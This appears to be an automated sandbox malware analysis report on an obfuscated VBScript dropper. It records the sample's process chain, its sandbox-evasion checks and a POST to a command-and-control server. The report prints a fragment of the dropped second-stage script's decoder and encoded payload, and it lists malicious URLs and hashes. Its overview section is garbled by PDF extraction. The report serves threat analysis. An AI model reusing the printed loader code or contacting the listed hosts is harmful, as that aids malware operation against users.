ID: 310931 Sample Name: 44S5D444F55G8222Y55UU44S4S.vbs Cookbook: default.jbs Time: 07:32:12 Date: 07/11/2020 Version: 31.0.0 Red Diamond Table of Contents
Table of Contents 2 Analysis Report 44S5D444F55G8222Y55UU44S4S.vbs 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Startup 4 Malware Configuration 4 Yara Overview 4 Sigma Overview 4 Signature Overview 4 AV Detection: 5 Data Obfuscation: 5 Persistence and Installation Behavior: 5 Malware Analysis System Evasion: 5 HIPS / PFW / Operating System Protection Evasion: 5 Mitre Att&ck Matrix 5 Behavior Graph 6 Screenshots 6 Thumbnails 6 Antivirus, Machine Learning and Genetic Malware Detection 7 Initial Sample 7 Dropped Files 7 Unpacked PE Files 7 Domains 7 URLs 7 Domains and IPs 8 Contacted Domains 8 Contacted URLs 8 URLs from Memory and Binaries 8 Contacted IPs 8 Public 9 General Information 9 Simulations 10 Behavior and APIs 10 Joe Sandbox View / Context 10 IPs 10 Domains 10 ASN 10 JA3 Fingerprints 11 Dropped Files 11 Created / dropped Files 11 Static File Info 11 General 11 File Icon 12 Network Behavior 12 TCP Packets 12 HTTP Request Dependency Graph 12 HTTP Packets 12 Code Manipulations 13 Statistics 13 Behavior 13 System Behavior 14 Analysis Process: wscript.exe PID: 6124 Parent PID: 3388 14 Copyright null 2020 Page 2 of 15 General 14 File Activities 14 File Created 14 File Written 14 Registry Activities 15 Analysis Process: wscript.exe PID: 5560 Parent PID: 6124 15 General 15 File Activities 15 Disassembly 15 Code Analysis 15
Copyright null 2020 Page 3 of 15 Analysis Report 44S5D444F55G8222Y55UU44S4S.vbs
Overview
General Information Detection Signatures Classification
Sample 44S5D444F55G8222Y55U Name: U44S4S.vbs AAnntttiiivviiirrruuss ddeettteecctttiiioonn fffoorrr UURRLL oorrr ddoomaaiiinn
Analysis ID: 310931 MAnuutlllitttviii iArAuVVs SSdcecataenncnnteieorrrn dd feeotttree cUctttRiiiooLnn offfoor rrrd ssouumbbamin… MD5: 75de44228bea09… SMSyyusslttteie AmV pp Srrroocccaeenssnsse crc oodnnennteeccttttisos ntttoo f onnree stttwwuobormrr…
SHA1: e95857291d694e… Ransomware VSVByBsSStcecrrmriiipp ttpt prpoeecrrrfeffoosrrrsm csso onobnbffefuucsstcsca atttotee dnd e cctaawlllllolssr … Miner Spreading SHA256: 2bfdb7103140e24… QVBuueSerrciiereisps tss peeennrssfioittirivvmee s BB oIIObfSSu s IIncnaffooterrmd aactatiioollnsn Quueerrriiieess sseennssiiitttiiivvee BBIIIOSS IIInnfffoorrrmaatttiiioonn … mmaallliiiccciiioouusss Tags: vbs malicious Evader Phishing
sssuusssppiiiccciiioouusss WQuiiinneddroioewwss ss SeSnhhseeilltlllil v SSecc rBrriiipIpOttt HSHo oIsnsttft o ddrrrmroopapstsi o VVnBB … suspicious Most interesting Screenshot:
cccllleeaann
clean CWCooinndtttaaoiiinwnss ccSaahppeaalblb Siiillliiictttiiireeipss t t ttoHo oddseettt tedecrcottt pvvisiirrr tttVuuaBa…
Exploiter Banker CCrroreenaattatteeinss s aa c pparrrpooaccbeeislsistsi e iiinsn stsouu sdsppeeetenncddte evddi r mtuoao…
FCFooreuuanntdde sW aSS pHHr o tttiicimeeserrsr fffioonrrr s JJuaasvvpaaessnccdrrriiieppdttt oomrrr oVV… Spyware Trojan / Bot
Adware IIFInnottteuerrnrnndee ttWt PPSrrroHovv itiididmeererr srs efeoeernn J iiainnv cacoosncnnrniepectc ttotiiioor nnV… Score: 80 Range: 0 - 100 JIJnaatvevaarn ///e VVt BPBSrSoccvrrriiipdptett frffi iillsleee wewniiittth hin vv eceorrryyn nlllooenncggti ossn…
Whitelisted: false MJaoovnnaiiit tto/o rVrrssB ccSeecrrrtrttaiapiiintn f rrirleegg wiiissitttrrhryy v kkeeeryyss l o/// nvvgaa lllusu… Confidence: 100% QMuouenerriritiieoesrss s sceeennrsstaiiitttiiivnve er e Ogppiseetrrrayat ttikiinneggy sSS y/y svsttateelmu …
TQTrrruiiieessr i tettoos lllosoeaandds mitiiivissess iiiOnnggp eDDrLaLLtLisnsg System
UTUrssieess atao k klnonoaowdw nmn wiwsesebibn bgbr rrDoowLwLsseserrr uusseerrr aaggee… Startup Uses a known web browser user age
System is w10x64 wscript.exe (PID: 6124 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\44S5D444F55G8222Y55UU44S4S.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) wscript.exe (PID: 5560 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\D68.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) cleanup
Malware Configuration
No configs have been found
Yara Overview
No yara matches
Sigma Overview
No Sigma rule has matched
Signature Overview
• AV Detection Copyright null 2020 Page 4 of 15 • Networking • System Summary • Data Obfuscation • Persistence and Installation Behavior • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection
Click to jump to signature section
AV Detection:
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Data Obfuscation:
VBScript performs obfuscated calls to suspicious functions
Persistence and Installation Behavior:
Windows Shell Script Host drops VBS files
Malware Analysis System Evasion:
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
HIPS / PFW / Operating System Protection Evasion:
System process connects to network (likely due to code injection or exploit)
Mitre Att&ck Matrix
Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Windows DLL Side- Process Masquerading 1 OS Query Registry 1 Remote Data from Exfiltration Ingress Tool Eavesdrop on Accounts Management Loading 1 Injection 1 1 1 Credential Services Local Over Other Transfer 1 Insecure Instrumentation 1 1 Dumping System Network Network Medium Communication Default Scripting 2 2 1 Boot or DLL Side- Virtualization/Sandbox LSASS Security Software Remote Data from Exfiltration Non- Exploit SS7 to Accounts Logon Loading 1 Evasion 2 Memory Discovery 2 1 Desktop Removable Over Application Redirect Phone Initialization Protocol Media Bluetooth Layer Calls/SMS Scripts Protocol 2 Domain PowerShell 1 Logon Script Logon Script Process Security Virtualization/Sandbox SMB/Windows Data from Automated Application Exploit SS7 to Accounts (Windows) (Windows) Injection 1 1 1 Account Evasion 2 Admin Shares Network Exfiltration Layer Track Device Manager Shared Protocol 1 2 Location Drive Local At (Windows) Logon Script Logon Script Scripting 2 2 1 NTDS File and Directory Distributed Input Scheduled Protocol SIM Card Accounts (Mac) (Mac) Discovery 1 Component Capture Transfer Impersonation Swap Object Model Cloud Cron Network Network Logon Obfuscated Files or LSA System Information SSH Keylogging Data Fallback Manipulate Accounts Logon Script Script Information 1 Secrets Discovery 1 1 2 Transfer Channels Device Size Limits Communication
Copyright null 2020 Page 5 of 15 Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Replication Launchd Rc.common Rc.common DLL Side-Loading 1 Cached System Owner/User VNC GUI Input Exfiltration Multiband Jamming or Through Domain Discovery Capture Over C2 Communication Denial of Removable Credentials Channel Service Media
Behavior Graph
Hide Legend Behavior Graph Legend: ID: 310931 Sample: 44S5D444F55G8222Y55UU44S4S.vbs Process Startdate: 07/11/2020 Architecture: WINDOWS Signature Score: 80 Created File DNS/IP Info
Antivirus detection Multi AV Scanner detection started Is Dropped for URL or domain for submitted file Is Windows Process
Number of created Registry Values wscript.exe Number of created Files
3 2 Visual Basic Delphi dropped Java
C:\Users\Public\D68.vbs, ASCII .Net C# or VB.NET
started C, C++ or other language Is malicious Queries sensitive BIOS VBScript performs obfuscated Information (via WMI, Windows Shell Script calls to suspicious Win32_Bios & Win32_BaseBoard, Host drops VBS files Internet functions often done to detect virtual machines)
wscript.exe
6
104.41.57.9, 49715, 80
MICROSOFT-CORP-MSN-AS-BLOCKUS United States
System process connects to network (likely due to code injection or exploit)
Screenshots
Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Copyright null 2020 Page 6 of 15 Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Source Detection Scanner Label Link 44S5D444F55G8222Y55UU44S4S.vbs 17% Virustotal Browse
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
Source Detection Scanner Label Link 104.41.57.9/lp1 0% Avira URL Cloud safe 104.41.57.9/bd21.php 2% Virustotal Browse 104.41.57.9/bd21.php 100% Avira URL Cloud malware 104.41.57.9/s 0% Avira URL Cloud safe
Copyright null 2020 Page 7 of 15 Source Detection Scanner Label Link 104.41.57.9/m/lp1 0% Avira URL Cloud safe 104.41.57.9/lp1a 0% Avira URL Cloud safe 104.41.57.9/ 0% Avira URL Cloud safe
Domains and IPs
Contacted Domains
No contacted domains info
Contacted URLs
Name Malicious Antivirus Detection Reputation 104.41.57.9/bd21.php true 2%, Virustotal, Browse unknown Avira URL Cloud: malware
URLs from Memory and Binaries
Name Source Malicious Antivirus Detection Reputation 104.41.57.9/lp1 wscript.exe, 00000001.00000003 false Avira URL Cloud: safe unknown .245871543.0000016B21B20000.00 000004.00000001.sdmp 104.41.57.9/s wscript.exe, 00000001.00000003 false Avira URL Cloud: safe unknown .242422439.0000016B21B02000.00 000004.00000001.sdmp 104.41.57.9/m/lp1 wscript.exe, 00000001.00000003 false Avira URL Cloud: safe unknown .233165119.0000016B239B2000.00 000004.00000001.sdmp, wscript.exe, 00000001.00000003.2293777 13.0000016B21B20000.00000004.0 0000001.sdmp, wscript.exe, 000 00001.00000003.250838421.00000 16B21B1E000.00000004.00000001. sdmp 104.41.57.9/lp1a wscript.exe, 00000001.00000003 false Avira URL Cloud: safe unknown .233165119.0000016B239B2000.00 000004.00000001.sdmp, wscript.exe, 00000001.00000003.2419035 38.0000016B21B20000.00000004.0 0000001.sdmp 104.41.57.9/ wscript.exe, 00000001.00000003 false Avira URL Cloud: safe unknown .233165119.0000016B239B2000.00 000004.00000001.sdmp, wscript.exe, 00000001.00000003.2287418 35.0000016B21B20000.00000004.0 0000001.sdmp
Contacted IPs
Copyright null 2020 Page 8 of 15 No. of IPs < 25%
25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs
Public
IP Country Flag ASN ASN Name Malicious 104.41.57.9 Domain: unknown United States 8075 MICROSOFT- true CORP-MSN- AS- BLOCKUS
General Information
Joe Sandbox Version: 31.0.0 Red Diamond Analysis ID: 310931 Start date: 07.11.2020 Start time: 07:32:12 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 4m 17s Hypervisor based Inspection enabled: false Report type: light Sample file name: 44S5D444F55G8222Y55UU44S4S.vbs Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 24 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal80.evad.winVBS@3/1@0/1
Copyright null 2020 Page 9 of 15 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Found application associated with file extension: .vbs Warnings: Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.
Simulations
Behavior and APIs
No simulations
Joe Sandbox View / Context
IPs
Match Associated Sample Name / URL SHA 256 Detection Link Context 104.41.57.9 HKLDSHAIUGRWQHHDSGWJDGW.vbs Get hash malicious Browse 104.41.57 .9/bd21.php
Domains
No context
ASN
Match Associated Sample Name / URL SHA 256 Detection Link Context MICROSOFT-CORP-MSN-AS- 14JQx1UBDb.exe Get hash malicious Browse 104.47.53.36 BLOCKUS UzvE3ZF7RC.exe Get hash malicious Browse 104.47.54.36 SvqMrRGKij.exe Get hash malicious Browse 104.215.148.63 60druuECyJ.exe Get hash malicious Browse 104.47.54.36 https://csiq- Get hash malicious Browse 52.239.152.74 my.sharepoint.com:443/:f:/g/personal/adib_abdulzai_recurrent energy_com/Ev6DalPAUv1LmgCzYnH15DEBG999PXNKTFa USlzBdOwzdA?e=5%3araxdfJ&at=9 HdVDM1xCzz.exe Get hash malicious Browse 104.47.53.36 9PCfW84luf.exe Get hash malicious Browse 52.146.42.226 HFQHJILO24.exe Get hash malicious Browse 104.47.54.36 p2WvRP28Qy.exe Get hash malicious Browse 104.47.54.36 73k4dRFewf.exe Get hash malicious Browse 52.233.66.100 4dq4icCR6s.exe Get hash malicious Browse 52.146.42.226
xwaz9uqdlY.exe Get hash malicious Browse 104.47.53.36 Get hash malicious Browse 13.107.42.14 https://app.box.com/s/t46hhy04j2shfmnpfm5injh5fah7z3kq https://secureipssca.com/notification/index.html Get hash malicious Browse 104.40.8.95 https://waltonpost- Get hash malicious Browse 40.108.144.25 my.sharepoint.com:443/:b:/p/jcapellades/EaA9E9OUzNlGkFa N8Brm888BJlFEMkQ6-Ibq9a-wdStvRw?e=4%3akLnOJc&at=9 https://cutt.ly/lgD28dp Get hash malicious Browse 52.239.242.148 Copyright null 2020 Page 10 of 15 Match Associated Sample Name / URL SHA 256 Detection Link Context
PI10943.exe Get hash malicious Browse 23.101.8.193 https://www.evernote.com/shard/s392/sh/fa9d8bce- Get hash malicious Browse 13.107.42.14 6c75-8e4b-f292- c8e5922b6f12/2c2e75787ef91022dc2eb256a739682c downloads.paessler.com/prtg/prtg.zip Get hash malicious Browse 20.4.63.142 Get hash malicious Browse 40.89.129.63 https://tenantimprovementsolution.com/Newfilesviewc7c782c3 b7c54f958e7eb2efff3a49b28866b4fc22dd46cfbad9e6ac9d0cd1 8cca873584897b48c88d82ecf5cd62783dServices/le/? signin=d41d8cd98f00b204e9800998ecf8427e&auth=27f4198fc 76827efbda8ed5ebc8be4d6828d922f8859cae62c2703a9f1a8f6 eafe21d60f
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
C:\Users\Public\D68.vbs
Process: C:\Windows\System32\wscript.exe File Type: ASCII text, with very long lines, with no line terminators Category: dropped Size (bytes): 1355 Entropy (8bit): 5.1507433823189634 Encrypted: false SSDEEP: 24:/73NoxUFl8V+VDuAl8TxXCBi7EB3jVXkkiBql+IX/hTqOFk24Z9N6eX1kquOx0Vd:/LNoGu557EZjVh8TIvh+1jl/+d MD5: ADA53E881D7709E386381A662A26D1C6 SHA1: 07DB9653653DEA5690C7990D8DB560DC4D1474C6 SHA-256: AF5C358C14F127C316CB5E130E6500894B91A4AC42BCA63CA401227CC8371697 SHA-512: 968DA3F67508B4A4926FFFCE9F900E2DA2A191613760B9490174601AD6FBA2F284F3A06FE874BE2560CE3B605D773FB64C81D512979B3561843F7FDE27788C7D Malicious: true Reputation: low Preview: on error resume next:w1=29:w1=w1+36:dim w2:w2=68:w2=w2+3:dim w3:w3=20:w3=w3+5:function chpped(bwdnru):muqhbif=w2:wjinnmrel=asc(Mid(bwdnru,1,1))-w1:bwd nru=Mid(bwdnru,2,Len(bwdnru)-1):qgsey="":while(Len(bwdnru)>0)qgsey=qgsey&(Chr((((asc(Mid(bwdnru,1,1))-w1))*w3+(asc(Mid(bwdnru,2,1))-w1)-wjinnmrel-muqh bif))):bwdnru=Mid(bwdnru,3,Len(bwdnru)-2):wEnd:chpped=qgsey:end function:dim wk1:wk1="AGXHNHGGUHMHBHHHGEDHJEUELHJEWEMFEHJEVFHGSHLG UELFXHBGVELHJEWEPEUEPEUEMEMEQFAEYFEHJEWFHFXHBGVELHJEWEPEVEPFWGWHGELHJEWEMEQEUEMFEHJEXFHEFEFEFEFFEHPHAHBHEGWELF WGWHGELHJEWEMFIEWEMHJEXFHHJEXEJELFNHAHKELELELELGSHLGUELFXHBGVELHJEWEPEUEPEUEMEMEQFAEYEMEMENEVEYEOELGSHLGUELFXH BGVELHJEWEPEVEPEUEMEMEQFAEYEMEQHJEVEQFBEUEMEMEMFEHJEWFHFXHBGVELHJEWEPEWEPFWGWHGELHJEWEMEQEVEMFEHPFPH GGVFEHJEUFHHJEXFEGWHGGVEDGXHNHGGUHMHBHHHGFEHLGWHMEDHHFSFHEDFNHKGWGSHMGWGAGTHCGWGUHMELEFEFFXHBGUHKHHH LHHGXHMERGJFXFWFSGFGFGBEFEFEMFEHHFSERHHHIGWHGEDEFEFHIHHHLHMEFEFEPEDEFEFHAHMHMHIFEESESEUETEXEREXEUEREYFBERFDESG TGVEVEUERHIHAHIEFEFEDEPEDETFEHHFSERHLGWH
Static File Info
General File type: ASCII text, with CRLF line terminators Entropy (8bit): 5.315743931350532 TrID: 669 Tracker Module (2002/1) 100.00% File name: 44S5D444F55G8222Y55UU44S4S.vbs File size: 6606 MD5: 75de44228bea0944af0a36729f513d18 SHA1: e95857291d694ef8162ae176c3b7c29c99b0152b SHA256: 2bfdb7103140e24549c8d263e237613e1f9d01f9bfbb62cf ff7fbe395a2f8285 SHA512: 733d8964f623fb668af929be08b9bdbd605a0d8104108e0 a36658492a447f90d651a04e31dbba617fdb805a18a2f28 6a06a9339f6865079cd27c2b29e5d2ae37
Copyright null 2020 Page 11 of 15 General SSDEEP: 192:2/JW7Du2bkqsAGlX49VpoSwU0sJkQk6YEsePMH cci9BnpqSJOzZxkCiFwofeXOQK:2/JW7DVnv File Content Preview: if (left("dfgdrthdfh",5) <> right("dfgdrthdfh",6)) then..funct ion wrpl(w1, w2, w4)..w3 = "".. while (InStr(w1,w2) <> 0 ) .. w3 = w3 + left(w1, InStr(w1,w2)-1) & w4.. w1 = right (w1, len(w1) - InStr(w1,w2)).. wend..rpl = w3 + w1..end Function....function
File Icon
Icon Hash: e8d69ece869a9ec4
Network Behavior
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP Nov 7, 2020 07:33:03.102250099 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:03.307905912 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:03.308109999 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:03.309449911 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:03.310700893 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:03.514910936 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:03.515522957 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:03.518367052 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:03.518410921 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:03.518457890 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:03.518482924 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:03.518496037 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:03.518574953 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:03.518631935 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:03.518639088 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:03.518642902 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:08.523752928 CET 80 49715 104.41.57.9 192.168.2.3 Nov 7, 2020 07:33:08.524023056 CET 49715 80 192.168.2.3 104.41.57.9 Nov 7, 2020 07:33:26.413630009 CET 49715 80 192.168.2.3 104.41.57.9
HTTP Request Dependency Graph
104.41.57.9
HTTP Packets
Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.3 49715 104.41.57.9 80 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Nov 7, 2020 76 OUT POST /bd21.php HTTP/1.1 07:33:03.309449911 CET Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 104.41.57.9 Content-Length: 3 Connection: Keep-Alive Cache-Control: no-cache
Copyright null 2020 Page 12 of 15 kBytes Timestamp transferred Direction Data Nov 7, 2020 78 IN HTTP/1.1 200 OK 07:33:03.518367052 CET Date: Sat, 07 Nov 2020 06:33:03 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5721 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 3d 59 92 c2 ba ae ff af ea ee e1 6d 05 02 1e 02 21 24 24 40 ef 7f 23 57 83 e7 d8 19 1a ba fb d4 b9 34 45 43 12 5b 96 25 59 96 25 d9 3c f4 51 1f c4 4e 0d 5a c1 eb a8 95 d8 69 05 57 5a 9f 74 a5 06 b8 3a c0 d5 45 d7 47 79 3c 84 6f d5 63 4d 28 57 8b 1d d4 ef e5 49 3e e4 19 bf 8b 9d 3c c2 ff a7 e8 b3 e5 3a 2e 45 65 2a d1 8b 6a 5a 4a 6b b5 83 eb bd 1a 94 f4 65 d5 43 d7 f0 12 72 2f ae f0 ea 45 27 46 d1 c2 bb 87 ff 77 68 af 95 3b 71 d5 7b 2d 44 af ae 4b 70 95 10 b7 cd b0 2b 0b 3f 0b bd 01 c8 4f b8 de c9 cb 56 c8 39 78 aa 57 3b 75 05 88 58 cb 40 03 2a ef d5 49 41 19 e2 98 56 27 f9 d4 27 d5 61 cb 50 fe 54 80 23 e5 d5 51 bc 55 9d ba 41 df 0b 25 95 f6 25 35 b6 2e 0a 25 05 48 88 16 03 4a 0c 97 2f 53 06 4a 03 cd f5 41 0e fa 08 3d ba b9 1a 95 18 d5 3d 5f 43 9e d4 03 5a 47 5e 75 f0 be e2 b3 05 a9 69 d4 d1 50 e5 c9 52 ed 4a 67 db 48 cb 4b 68 00 7a b0 a9 0d a9 d5 41 55 db ea a8 a3 ac d5 7e 63 3b 0d 70 66 b1 1d 79 02 e8 48 51 2b 2d 03 50 51 82 cc 7c c9 8b bc ca b3 ac e1 f3 0e ef 06 de 0f 7a e3 3d 7c 7e 92 bd b9 3f d0 77 77 4f ed f9 1e c1 c9 dd 57 d9 fb 67 a9 dd fd 0b bc 1b 28 77 51 15 c1 c1 67 67 d9 c2 bb 31 cf 3b 78 3f e9 f9 05 ee 40 df e1 fb c1 3d a3 6b b8 ba 40 bd 0b dd c3 3e dc 0c 3c c1 b8 41 f9 0b 40 a4 fb d0 3e c1 83 ef 7c ff 66 ea 9c 3e 30 3f 30 3f 30 3f 30 3f 30 3f 30 3f 30 3f 30 3f 30 ff e7 60 2a 53 f7 61 ca c0 73 b5 33 df 1b ba 6e 4c bb f8 c9 6d 74 1f f8 1f f8 1f f8 1f f8 1f f8 1f f8 1f f8 1f f8 1f f8 1f f8 1f f8 db e0 b3 cf da be e5 45 a3 b7 ba d7 b5 f3 d6 b7 6a 80 2b a1 2b f5 94 4f 8a 46 09 f2 81 d7 ba 55 47 85 91 97 93 1a 84 46 7f b7 56 f2 0e 77 2a 35 a8 3d 94 ba aa 1e 9e 34 18 e1 a1 67 27 bd 87 a7 f0 67 4b 05 cf 12 c8 ae 84 8b 70 71 0c 0b f0 79 10 56 8d 8f 8c a9 5d 18 19 83 9a 51 64 cc d6 cb b7 13 f4 c0 7a f1 ab b8 16 f6 1e 3e 8f 86 02 ae 0f 5c 5e 61 6b 35 3c ed d4 17 f4 1a e8 26 b4 a8 74 43 11 a7 4a dd 75 05 4f b5 dc 03 dc 9d 90 0e 8b 29 95 6a d1 32 2c 47 c9 1c b5 a4 7a 88 9b e8 cc 0b e3 0b 8a 9f 01 cf 6e 00 ef 36 8b 7b d4 77 f5 44 aa 71 2f 32 bd 6b 73 a5 d5 25 a5 2a 45 90 b8 0d a4 80 90 a3 ec e8 9e d2 67 8a 7d 19 ba b2 14 c9 c7 12 9d d4 09 a3 65 4c 2b 8c 75 f9 ef fe 7e 99 86 39 cc 28 1a b3 97 1d f4 61 80 56 7c 8f 4b f8 b6 20 5b 17 c4 51 7e a1 5c c0 93 16 71 a5 52 7b 83 fb 4e 9c 00 f2 48 14 aa 08 d3 10 b3 1c e7 1a 31 8a af 8c 34 5f 58 86 61 54 62 1f 1e 16 33 8b 2f b4 f2 a4 48 70 d2 8b 10 c6 22 ac 44 e6 2d cc 39 b9 c8 c1 f7 72 25 07 84 50 1a 33 93 97 52 02 a8 d7 6b 85 71 4b a0 1e 50 18 f1 d3 5c f7 12 d0 2f 8f 6f 0b 6d 31 1d 8d 2c c0 78 4a 69 5e d0 1f 29 bd 27 34 eb d4 58 6e d7 f1 8f 65 66 5e 53 ed 54 a5 1e 38 12 67 69 b1 ae dd 0e 68 ac 51 c3 01 ec d6 68 9a 0a ae 4f 5b db 29 f3 8c 7b b3 44 79 df 3b 33 22 79 34 83 34 92 0c e9 44 5a db cd f0 1a cf 49 98 9d 1e 80 91 16 03 8c 95 3a 28 31 ff bc 76 6d 9e 15 cc 68 c0 a1 41 8d af d0 26 bc e6 36 56 ce 1d bb 6d 34 5d 85 a3 02 6d b4 47 4d be 20 31 27 98 cd 47 90 0c c0 52 36 06 1f cc 6a e8 37 ca 8b b2 df 80 96 57 d4 62 f2 0c ff 6b 3f 57 58 39 dc 06 6d 22 7f 1b a8 ca 5a da e2 01 fa be 26 4d 72 80 f9 b2 02 45 65 ee bf 41 16 eb 05 3d 66 c7 ae e1 c8 4b e3 6f 8b 54 7d b3 5f 2b fb 72 a0 cc 8f 8e c7 cc 3a ae 96 f5 b9 ef e7 ca d6 69 a6 05 db ad a6 ac a6 55 b5 d7 e0 1c 5a 81 b9 7b d1 fd 75 16 ee cc 1c e0 4b 39 3b da e2 98 d8 d3 51 ae d6 98 Data Ascii: =Ym!$$@#W4EC[%Y%
Code Manipulations
Statistics
Behavior
• wscript.exe • wscript.exe
Click to jump to process
Copyright null 2020 Page 13 of 15 System Behavior
Analysis Process: wscript.exe PID: 6124 Parent PID: 3388
General
Start time: 07:33:00 Start date: 07/11/2020 Path: C:\Windows\System32\wscript.exe Wow64 process (32bit): false Commandline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\44S5D444F55G8222Y55UU44S4 S.vbs' Imagebase: 0x7ff6970d0000 File size: 163840 bytes MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high
File Activities
File Created
Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\Public\D68.vbs read attributes | device synchronous io success or wait 1 7FFB52341571 CreateFileW synchronize | non alert | non generic write directory file
File Written
Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\Public\D68.vbs unknown 1355 6f 6e 20 65 72 72 6f on error resume success or wait 1 7FFB5234E70B WriteFile 72 20 72 65 73 75 6d next:w1=29:w1= 65 20 6e 65 78 74 3a w1+36:dim 77 31 3d 32 39 3a 77 w2:w2=68:w2=w2+3:dim 31 3d 77 31 2b 33 36 w3:w3=20:w3=w3+5:functi 3a 64 69 6d 20 77 32 on chp 3a 77 32 3d 36 38 3a ped(bwdnru):muqhbif=w2: 77 32 3d 77 32 2b 33 wjinnmr 3a 64 69 6d 20 77 33 el=asc(Mid(bwdnru,1,1))- 3a 77 33 3d 32 30 3a w1:bwd 77 33 3d 77 33 2b 35 nru=Mid(bwdnru,2,Len(bwd 3a 66 75 6e 63 74 69 nru)-1 6f 6e 20 63 68 70 70 ):qgsey="":while(Len(bwdn 65 64 28 62 77 64 6e ru)>0)qgsey=qgsey& 72 75 29 3a 6d 75 71 (Chr((((asc(Mid(b 68 62 69 66 3d 77 32 wdnru,1,1))-w1) 3a 77 6a 69 6e 6e 6d 72 65 6c 3d 61 73 63 28 4d 69 64 28 62 77 64 6e 72 75 2c 31 2c 31 29 29 2d 77 31 3a 62 77 64 6e 72 75 3d 4d 69 64 28 62 77 64 6e 72 75 2c 32 2c 4c 65 6e 28 62 77 64 6e 72 75 29 2d 31 29 3a 71 67 73 65 79 3d 22 22 3a 77 68 69 6c 65 28 4c 65 6e 28 62 77 64 6e 72 75 29 3e 30 29 71 67 73 65 79 3d 71 67 73 65 79 26 28 43 68 72 28 28 28 28 61 73 63 28 4d 69 64 28 62 77 64 6e 72 75 2c 31 2c 31 29 29 2d 77 31 29
Source File Path Offset Length Completion Count Address Symbol Copyright null 2020 Page 14 of 15 Registry Activities
Source Key Path Name Type Data Completion Count Address Symbol
Analysis Process: wscript.exe PID: 5560 Parent PID: 6124
General
Start time: 07:33:01 Start date: 07/11/2020 Path: C:\Windows\System32\wscript.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\D68.vbs' Imagebase: 0x7ff6970d0000 File size: 163840 bytes MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high
File Activities
Source File Path Access Attributes Options Completion Count Address Symbol
Source File Path Offset Length Completion Count Address Symbol
Disassembly
Code Analysis
Copyright null 2020 Page 15 of 15